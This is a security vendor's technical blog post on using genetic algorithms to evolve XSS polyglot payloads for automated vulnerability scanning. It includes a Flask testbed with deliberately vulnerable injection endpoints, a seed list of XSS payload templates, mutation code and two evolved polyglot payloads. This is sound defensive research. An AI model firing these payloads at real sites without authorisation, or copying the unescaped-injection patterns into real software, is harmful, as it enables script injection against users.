Ostorlab: Mobile App Security Testing for Android and iOS

Author

Alaeddine Mesbahi


                        Mon 01 March 2021

Abstract

The following article is a technical deep dive into how genetic algorithms can be leveraged to create superhuman XSS polyglot payloads.

We start by highlighting the importance of detecting XSS vulnerabilities, the challenges faced by automated solutions to fully test real-life applications in a reasonable time, and then a technical deep dive into the use of genetic algorithms to create polyglot payloads.

The final part of the article shows examples of the generated payloads and discusses areas for future improvements.

Cross-site scripting (XSS)

Cross-site scripting (XSS) is a vulnerability class that affects Web Applications. It concerns also Mobile Applications built using javascript multi-platform Frameworks, like Cordova or Ionic and browser embedded applications.

According to Hacker One’s "Trends and Security report", XSS is the most reported vulnerability. It has also been listed in the OWASP Top 10 Security Risk since its start in 2003.

Besides the wides pread of XSS vulnerabilities, their impact can have severe consequences. For instance, an XSS in Cloud Console, like AWS can lead to remote code execution in an EC2 instance. An XSS on Google Playstore can lead to malicious application installation on the targeted user’s mobile device.

XSS has also been used by state-sponsored attackers and criminal organizations to track dissidents and whistleblowers’ locations or to unmask their real identities.

Sources:

Twitter XSS exploited by state-sponsored attackers

At the same time, exploitation of XSS is hard to detect. Protection solutions like WAF or RASP are ineffective, to the point where Chrome XSS Auditor was eventually deprecated because of the prevalence of known bypasses.

XSS Auditor Bypasses

XSS are not only common, but its impact can be devastating and real-life exploitation is hard to detect.

Spotting XSS

XSS happens in different forms and shapes. There are reflected XSS, persistent, DOM-based, postMessage-based.

The input of an XSS can come from the path, the parameters, the URL fragment, the cookie, the referrer. It can be injected from a parent frame or from a child iframe.

Static approaches to detect XSS vulnerabilities are rarely effective due to the highly dynamic nature of the Javascript language. This fact is exacerbated by Javascript transpiler, minifier, and uglifier that leverage the dynamic nature of the language for performance and obfuscation reasons.

The most effective way to identify XSS vulnerabilities is using dynamic analysis, which can be further enhanced by different forms of execution tracing, like trusted-types taint tracing, function hooking, or low-level chrome String tracing.

Detecting XSS with dynamic analysis is simple. It consists of injecting a working payload that would trigger a callback indicating the success of the injection.

Dynamic Detection

Ostorlab’s implementation relies on Chrome to render and test the XSS. Using a full-blown browser allows out-of-the-box support of javascript=heavy applications, like SPA (Single Page Application) built using frameworks like React, Angular, or Vue.js.

Chrome is started in headless mode with a long list of flags for performance optimization, like disabling certain human-friendly features, and certain security features that could affect the result of the analysis.

Below examples of flags passed to chrome:

'--no-default-browser-check',
'--no-first-run',
'--disable-client-side-phishing-detection',
'--disable-component-extensions-with-background-pages',
'--disable-default-apps',
'--disable-extensions',
'--mute-audio',
'--disable-background-timer-throttling',
'--disable-backgrounding-occluded-windows',
'--disable-features=ScriptStreaming',
'--disable-hang-monitor',
'--disable-ipc-flooding-protection',
'--disable-notifications',
'--disable-popup-blocking',
'--disable-prompt-on-repost',
'--disable-renderer-backgrounding',
'--js-flags=--random-seed=XXXXX,
'--use-gl=swiftshader',
'--disable-background-networking',
'--disable-breakpad',
'--disable-component-update',
'--disable-domain-reliability',
'--disable-sync',
'--metrics-recording-only'

Once chrome is running, many test sessions start simultaneously injecting each target input with a payload.

A payload is similar to <svg onload={callback}>.

The callback has multiple implementations, it can be a Javascript function that sends a request to the server, it can be an alert box or console message.

Ostorlab implementation relies on console events to notify of the presence of an XSS. Other approaches have shown quirks when overloading the callback with any javascript logic, which can lead the code to be hoisted, added to the bottom of the javascript queue.

The queue is generally overloaded with events caused by the XSS fuzzer and can cause the XSS to be missed if the page is exited before fully clearing the queue.

Console messages are sent directly by Chrome and can be intercepted using the Chrome Debug protocol.

Chrome Debug Protocol: Console

The console has however been deprecated in favor of a more powerful replacement, that provides a long-awaited functionality, stack tracing:

Chrome Debug Protocol: Log

The Million Payload Dilemma

The Achilles heel of XSS dynamic testing is the million payload dilemma.

XSS happens in different contexts on the client-side, it can happen in an a tag, a div tag, in an attribute, in its content. It can have a size limitation, a character limitation, or it can be caused by injecting a specialized JSON object.

Below are examples of XSS contexts:

@app.route("/test_bed/html_element")
def test_bed_html_element():
   return '''<div>{inject}</div>'''

@app.route("/test_bed/js_html_element")
def test_bed_js_html_element():
   return '''
       <div id='elmtId'></div>
       <script>
       window.onload = () => {{
           const payload = decodeURIComponent(window.location.hash.substr(1));
           document.getElementById('elmtId').innerHTML = payload;
       }}
       </script>'''

@app.route("/test_bed/html_attribute_value_double_quoted")
def test_bed_html_attribute_value_double_quoted():
   return '''<div class="{inject}">content</div>'''

@app.route("/test_bed/html_attribute_value_single_quoted")
def test_bed_html_attribute_value_single_quoted():
   return '''<div class='{inject}'>content</div>'''

@app.route("/test_bed//html_attribute_value_not_quoted")
def test_bed_html_attribute_value_not_quoted():
   return '''<div class={inject}>content</div>'''

@app.route("/test_bed/html_attribute_name")
def test_bed_html_attribute_name():
   return '''<div {inject}='class'>content</div>'''

@app.route("/test_bed/script_element")
def test_bed_script_element():
   return '''<script>{inject}</script>'''

@app.route("/test_bed/js_script_element")
def test_bed_js_script_element():
   return '''
       <script id='elmtId'></script>
       <script>
       const payload = decodeURIComponent(window.location.hash.substr(1));
       document.getElementById('elmtId').innerHTML = payload;
       </script>'''

@app.route("/test_bed/script_element")
def test_bed_script_element():
   return '''<script>{inject}</script>'''

@app.route("/test_bed/js_script_element")
def test_bed_js_script_element():
   return '''
       <script id='elmtId'></script>
       <script>
       const payload = decodeURIComponent(window.location.hash.substr(1));
       document.getElementById('elmtId').innerHTML = payload;
       </script>'''

@app.route("/test_bed/script_double_quoted")
def test_bed_script_double_quoted():
   return '''<script>var hello="{inject}";</script>'''

@app.route("/test_bed/script_single_quoted")
def test_bed_script_single_quoted():
   return '''<script>var hello='{inject}';</script>'''

@app.route("/test_bed/iframe_src")
def test_bed_iframe_src():
   return '''<iframe src="{inject}"></iframe>'''

@app.route("/test_bed/js_iframe_src")
def test_bed_js_iframe_src():
   return '''
       <iframe id='elmtId'></iframe>
       <script>
       const payload = decodeURIComponent(window.location.hash.substr(1));
       document.getElementById('elmtId').setAttribute('src', payload);
       </script>'''

@app.route("/test_bed/html_comment")
def test_bed_html_comment():
   return '''<!-- {inject} -->'''

@app.route("/test_bed/textarea_element")
def test_bed_textarea_element():
   return '''<textarea>{inject}</textarea>'''

Let’s do some basic math to understand the scope of the problem.

Let’s imagine we would like to test 30 injection contexts (Ostorlab’s testbed has over 50 injection contexts and we keep adding new ones). Let's also imaging we would on average test for 20 injection points only:

Path /{here}/{here2}/{here3}
URL Argument /a/b/c?q={here}&{here}=test
Fragment a/b/c#{here}
Cookies Cookile: {here}={here}
Headers {here}: {here}\r\n
Body parameters {here}={here}&{here}={here}
Referer Referer: {here}
Iframe parent injection

And we would like to test every page, a web application like Uber, unauthenticated parts only has over 120k page, the institutional web site of a bank like ING has over 7k pages.

The test with high performances parallel VM on a website that can manage high QPS (Queries Per Second) would be:

30 payloads
20 injection points
20 seconds per test between loading, execution, click event triggering, and callback execution
100 parallel instances

Uber test would take 72M payload and 166 days to complete, ING would require 4.2 M requests would take 9 days to complete.

Testing every page, in every input, for every vulnerability, covering every context, needs millions of requests, which requires days, if not weeks to complete.

Polyglot Payloads

In order to lower the number of requests needed to fully test an application, combining multiple injection contexts with a single payload is an attractive optimization.

For instance, replacing 30 contexts with a single payload will allow us to go from 166 days of testing to 5 days for Uber and from 9 days of testing to 7 hours.

The polyglot payload is a known topic among security testers, with competition on creating the best-performing ones:

While there are already very good payloads available online, these payloads are missing contexts from modern javascript frameworks as well as mobile contexts.

The other issue with the public payloads is that it solves the problem of maximizing coverage with a single request. Several contexts are however incompatible with each other and therefore we need at least 2 payloads to have full coverage, which is never tackled by the public payloads.

The creation of these payloads is a hard, time-consuming problem that some associate with witchcraft as it is very hard to reason about how a certain payload is working.

Weighing in the benefits and the challenges of creating polyglot payloads, can we automate their creation? and can we outperform existing ones?

Automated Generation of Payloads

In order to automate the creation of polyglot payloads, a solution that came to mind is genetic algorithms.

The use of genetic algorithms for creative input generation is not a novelty in security tools. Genetic algorithms already powering several binary fuzzers like AFL and HonggFuzz.

American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. It uses a modified form of edge coverage to effortlessly pick up subtle, local-scale changes to program control flow.

Genetic Algorithms are inspired by the process of natural selection that belongs to the larger class of evolutionary algorithms (EA). Genetic algorithms are commonly used to generate high-quality solutions to optimization and search problems by relying on biologically inspired operators such as mutation, crossover and selection.

Genetic Algorithms are simple to implement, they are composed of repeatable iterations that stop either after finding a solution or after a fixed number of iterations. The implementation for our problem looks as follows:

1st Phase, the Population: Each iteration starts with a population. The initial population in our case is a list of payloads that cover every context in our testbed. Multiple experiments were done using simple small payloads, others used high-performing payloads added to the mix.
2nd Phase, the Evaluation: this phase consists of testing each payload on the testbed and listing each of the covered test cases.
3rd Phase, the Selection: consists of finding best-performing payloads. This can be done using different selection criteria, like the number of covered contexts, size of the payload, a weighted ratio of context per size, etc.
4th Phase, the Mutation, and Crossover: consists of generating a new population from the existing ones. These are a set of transformations like token injection, character flips, truncation, partial concatenation, etc.

Figuring out the exact formula for each step of the algorithm was a trial and error process.

Testbed

The testbed is composed of a set of vulnerable endpoints representing different types of XSS, like DOM, reflected, stored, and postMessage. The testbed implements different types of input manipulation, like url encoding, html escaping and supports different types of injection points.

Each context was assigned a weight, based on prevalence. The weight was assigned using on input from people experts in the topic of XSS.

Initial population

Multiple experiments were carried out using different sets of initial populations.

The use of known high-performing payloads was often quickly improved to include other contexts, but also quickly stagnates in a local maximum.

Use of simple payloads with limited coverage converged slowly to higher performing payloads, but the outcomes were novel and unexpected.

_PAYLOADS = (
   "<svg/onload={callback}//>",
   "\" onclick={callback} a=\"",
   "' onclick={callback} a='",
   "a onclick={callback} ",
   "'><svg onload={callback}><b id='",
   "--><svg/onload={callback}//>",
   "</textarea><svg/onload={callback}//>",
   "</title><svg/onload={callback}//>",
   "</style><svg/onload={callback}//>",
   "*/</style><svg/onload={callback}//><style>/*",
   "{callback};",
   "\"-{callback}-\"",
   "'-{callback}-'",
   "</script><script>{callback};",
   "%0a{callback};",
   "*/{callback};/*",
   "*/{callback};/*",
   "{callback}",
   "\\x3csvg onload={callback}\\x3e",
   "a/;{callback};//",
   "a onclick={callback} ",
   "a\" onclick={callback} a=\"",
   "a' onclick={callback} a='",
   "javascript:{callback}",
   "';{callback};//",
   "\";{callback};//",
   "`;{callback}//",
   "<svg onload={callback}>",
   '''"'-function(){{{callback}}}()-">\"><scrIpt>{callback}</scrIpt><aUdio src=x oNerror={callback}><"-'-function(){{{callback}}}()"''',
   '''jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk={callback} )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd={callback}//>\x3e''',
)

Selection

The selection phases consist of selecting the fittest elements that will feed into the creation of a new population.

Multiple experiments were done with different fitness functions, like selecting the shorted payloads, the highest performing based on the number of covering contexts, include the size of the payload. The weight of the context was used to assign a score to each payload.

Results have shown that the naive fitness algorithm performed poorly, while the functions incorporating multiple factors provided better solutions.

Cross over and mutation

The cross-over and mutation operations were tailored to the problem. For instance, a list of tokens was created to use in the augmentation step.

The pruning and cross-over carefully ensured that it doesn't affect the location of the callback.

The mutations used remained simple and proved to be effective at generating novel solutions.

TOKENS = (
   ';',
   ',',
   '/',
   '/*',
   '"',
   '\'',
   '//',
   '*/',
   '/**/',
   'javascript:',
   '-',
   '`',
   ' ',
   '(',
   ')',
   '</',
   '\n',
   '%0D%0A',
   'a',
   'style',
   'button',
   'title',
   'template',
   'input',
   'title',
   'textarea',
   'script',
   'iframe',
   'frameset',
   'noscript',
   'noembed',
   'template',
   'svg',
   'audio',
   'video',
   'source',
   '<!--',
   '-->',
   '\x3c',
   '\x3e',
   '{callback}',
   'onload=',
   'onerror=',
   'href=',
   'formaction=',
   'src=',
   'onfocus=',
   'onblur=',
   'poster=',
   'autofocus',
   'srcdoc=',
   'function(){{{callback}}}()',
   '()=>{callback}',
)

def _mutate_with_evolution(self):
   for individual in self._population:
       for _ in range(self._repeated_extra_tokens):
           extra_tokens = random.choices(TOKENS, k=self._extra_tokens)
           self._new_population.add(individual + ''.join(extra_tokens))
           extra_tokens = random.choices(TOKENS, k=self._extra_tokens)
           self._new_population.add(''.join(extra_tokens) + individual)

def _mutate_with_flips(self):
   for individual in self._population:
       separations = re.split('{callback}', individual)
       separation = random.choice(separations)
       if separation:
           self._new_population.add(individual.replace(separation, random.choice(TOKENS), 1))

During the mutation and cross-over step, some payloads were discarded, like over a size limitation.

A drawback of genetic algorithms is the difficulty to reproduce past results. The randomness factor of the mutation and cross-over operations causes each experiment to generate different outcomes. To ensure the experiment is reproducible, seeding all the randomness functions with saved values is necessary.

Result

Below are examples of high-performing payloads, the first used in the seed a known high-performing payload that was slightly improved. The second was created from simple payloads.

Some payloads leverage unknown behavior in the Chrome browser, like for instance embedded SVG tag in another SVG tag still triggers javascript callback.

javascript:{callback}//*/javascript:javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*&lt;svg/*/onload={callback}onload={callback}//><svg onload={callback}><svg onload={callback}>*/</style><script>{callback}</script><style>

-{callback}//</style><svg/onload={callback}//>/**/{callback}//("-{callback}-"///,\'-{callback}-\'--><svg/onload={callback}>\\x3csvg onload={callback}\\x3e</textarea><svg/onload={callback}//>/**/{callback}//</script><script>{callback}//function(){{{callback}}}()*/{callback}--><svg/onload={callback}//>

Future

The use of this approach against XSS filters demonstrated promising results, but still requires work to adapt the fitness functions.

Other areas of improvement are the use of adaptive Genetic Algorithms to speed up convergence to a high-performing solution and the exploration on the use of the Monte Carlo search tree.

The Application of this approach to similar concepts for live application fuzzing, like finding XSS vulnerabilities that require custom input, things like {action: ‘render’, payload: ‘injectme’ } and use taint tracing as a feedback loop.

Tags:

xss, web, security

We do newsletters, too

Get the latest news, updates, and product innovations from Ostorlab right in your inbox.

Table of Contents

Abstract
Cross-site scripting (XSS)
Spotting XSS
Dynamic Detection
The Million Payload Dilemma
Polyglot Payloads
Automated Generation of Payloads
Result
Future

Finding superhuman XSS polyglot payloads with Genetic Algorithms